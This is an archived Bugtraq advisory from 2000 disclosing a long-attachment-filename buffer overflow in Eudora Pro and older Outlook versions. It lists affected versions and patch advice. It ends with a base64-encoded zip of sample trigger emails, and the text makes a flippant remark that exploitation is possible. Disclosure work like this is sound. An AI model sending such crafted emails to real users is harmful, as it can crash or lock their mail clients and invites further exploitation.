[14904] in bugtraq
Eudora Pro & Outlook Overflow - too long filenames again
daemon@ATHENA.MIT.EDU (Ultor)
Mon May 15 16:26:06 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0025_01BFBE7D.AF603310"
Message-Id: <002801bfbe6c$eccd5bd0$0100a8c0@ultor>
Date: Mon, 15 May 2000 14:56:00 +0200
Reply-To: Ultor <Ultor@HERT.ORG>
From: Ultor <Ultor@HERT.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0025_01BFBE7D.AF603310
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
==== APPLICATIONS AFFECTED
Qualcomm Eudora Pro (all versions)
Outlook Express 4.*
Microsoft Outlook 98
Eudora Light and Outlook Express 5.0 are NOT affected
==== DESCRIPTION
These e-mail/news programs improperly handle filenames of files attached in
e-mails. Too long filename can result in a buffer overflow condition when
the program processes the attachment and tries to save the temporary file.
As the reader generally processes the attachments when the user reads the
message, the buffer overflow condition can be initiated.
In Outlook if filename got graphic file extension then the buffer overflow
condition can be initiated when trying to view the message (my last post on
BUGTRAQ) if not then overflow will occur if user will try to save/open
attached file.
In Eudora Pro e-mail is processed while downloading mail from server so
buffer overflow occurs when message is processed from spool directory. This
can even lock e-mail account for the Eudora Pro users. As i know same
problem is in Microsoft Outlook 98 version.
==== EXAMPLE
Example Outlook e-mails are attached with this message (sorry to all Eudora
Pro
users for latest problems).
==== EXPLOITATION
possible ... have fun =)
==== PATCHES
If you use Outlook 98 or 4.* then change it on 5.* version. If you like
Eudora style then use Eudora Light or wait for Eudora Pro patches.
PS. In my opinion saving temporary files with same filenames as files
attached in e-mail is very lame. They should use random filenames.
==== CREDITS
Greetz for notice that Eudora Pro is vulnerable for same bug as Outlook to:
Felicia Catherine Kaye <feline@feline.pp.se>
Michael Smith <mike@icon.co.za>
Greeetz to HERT,Lam3rZ,TESO
----------------------
Mark Bialoglowy [Ultor@hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
------=_NextPart_000_0025_01BFBE7D.AF603310
Content-Type: application/x-zip-compressed;
name="lfilename_bug.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="lfilename_bug.zip"
UEsDBBQAAgAAAG52rygAAAAAAAAAAAAAAAAOAAAAbGZpbGVuYW1lX2J1Zy9QSwMEFAACAAgAbHav
KOvijSOnAQAASwQAACMAAABsZmlsZW5hbWVfYnVnL2xvbmdfZmlsZW5hbWVfYnVnLmVtbO1SbW/T
MBD+TKT8h1O+gjOnL0tnKLCyTgKRrVLH4Ft1TdzGI7Ej+yKaf4+TTaJDExoSH3lky/bdPed7u7Sm
FhB9qcjYCN4M5/tSWoqN3b8NgxsjnpCu2+2dzEnA1xIJCgMt/EBNQAZyi670lwI7eBcGF0hSwBrp
FSTwCTWMOOeQnIrpTIzH8JInnIdB9jFbsltpnTJaQBJ70QejSWpiN13jHdRtRapBSye1OsjidRi8
2JpWF2i7ecQ85psreaCVt9j4D/o92/BkcTmdpGdxypMJTyc8CoNvbGWVsYo6AeP+ma0zVNWR9MrY
GqtB5RXSCshUbo0zO4LrlipjvsPy0FjpHEzidBSPk4THyUBQtbz+vBSwsqZoc1nAojtiP6jh9hHN
17hUDvzC+zRZnyfU3j/uJSgNfXVg14dFcW/P2LMz/r2O5CknTYVK9yXMS7RO0jxSzrDZbHrGRtER
w6J2O2nZUuemUHovIN0q6iP4p1ForOU8Gqbrrtn/OYAtOnk6+WVyoVxjnKJhbpAI87L28t7tzjfv
3vW5x8Lj/D+eg4cu/FWHGQuDn1BLAwQUAAIACABudq8oqQRNRB8DAADtCAAAKwAAAGxmaWxlbmFt
ZV9idWcvbG9uZ19maWxlbmFtZV9idWdfZW5jb2RlZC5lbWztVO9vmzoU/bxI+R+uon3YtAexIaSE
Lc1Ck6ydRkOa9Oc0VQ44wQtgZEzTvL/+GdqqWZW9bdImbdIAA7bvvZxzfPCF5o99UzsJMulAEUsu
3uZ8TSQNIj3giZ7F9doJlYVINZ/IyIE3p7uC9suogLIbGjqwEDy5qwUvsjluWzrPeEz1LMt0maVU
qgT4aGBDx22kG6Z6WJ9e1mvP5ht4Uhde2HpHN5vV/SWsmYxg6s18YCH4/b5ht9uWSlyoT73ZiX7/
NUyL9B/ALfDIBgyEEGDLQS0HG/DOm9VrHs1zsqTa0UCRU9MBwvPFPCTB89AOiDkn6DnCCBE7QG+r
TyiuI8XQgUYlRePrksy48zVY9dq0mH+mgVJ9tHbgPCISQg4FrEkqQXIIBMkj9RIq1L16baCynR1U
2g7CDjLhFVJ9RebIG2pnVOSMpw5gXQ1daL5gXDC5ccAsu97UIyzeGj3mIiFxNaUmqHDAY4HgOV9I
GBcy5nwFw9tMKKGgpe8Zuokx0pXuBzyVNJXabJMpcIliyjIiZDNhtzR8XS4oL9KQiE23oamje31M
b6WvIq4V9rJ1rhF2R+7AHeid/sgyOhZqVDhYQscfhg74godFQENwN1ug7qfh7BGNYqb0jlgO6iJ3
WLQSDCR36wsshVIdWJRspV7Ga9p3w3pKVqqUZhYTlpY8g4iInMpug+Vcs22roxmNrQxB0nxBhTZM
Ax6ydOnA3pzJEsE9hrFgS5aSGB7MWB4PNqvc9WCyiAqpc7G8d9eXgzuC7nyDIZeb4N+UkXvb7DmW
vWXBb9qvPPer6yeqlpKEdhvd3qNoPbc3OR25k6t+NDhw3er9y8Yv4s9N66Z5urSvPLIcnfvrS/vC
PB30uqrik1rLg1bzZDV679sutt8t10PfNc/Po2N6Ji/dmTuhseuOJyNsH/nZ0G+ekEF/Yh+GV7tq
kWN3Eq5uVV5/HW7lHaq8SwOvPiRnratp/+Zy4662Me+qtYPXd7U/u9awCA8j1Ov+/58xJzlttx5D
BizPeM5ktaERKUkQJWq89M9CbVZ/PfTbr/sv8tAPbkXlfvofUEsBAhQAFAACAAAAbnavKAAAAAAA
AAAAAAAAAA4AAAAAAAAAAAAwAAAAAAAAAGxmaWxlbmFtZV9idWcvUEsBAhQAFAACAAgAbHavKOvi
jSOnAQAASwQAACMAAAAAAAAAAAAgAAAALAAAAGxmaWxlbmFtZV9idWcvbG9uZ19maWxlbmFtZV9i
dWcuZW1sUEsBAhQAFAACAAgAbnavKKkETUQfAwAA7QgAACsAAAAAAAAAAAAgAAAAFAIAAGxmaWxl
bmFtZV9idWcvbG9uZ19maWxlbmFtZV9idWdfZW5jb2RlZC5lbWxQSwUGAAAAAAMAAwDmAAAAfAUA
AAAA
------=_NextPart_000_0025_01BFBE7D.AF603310--
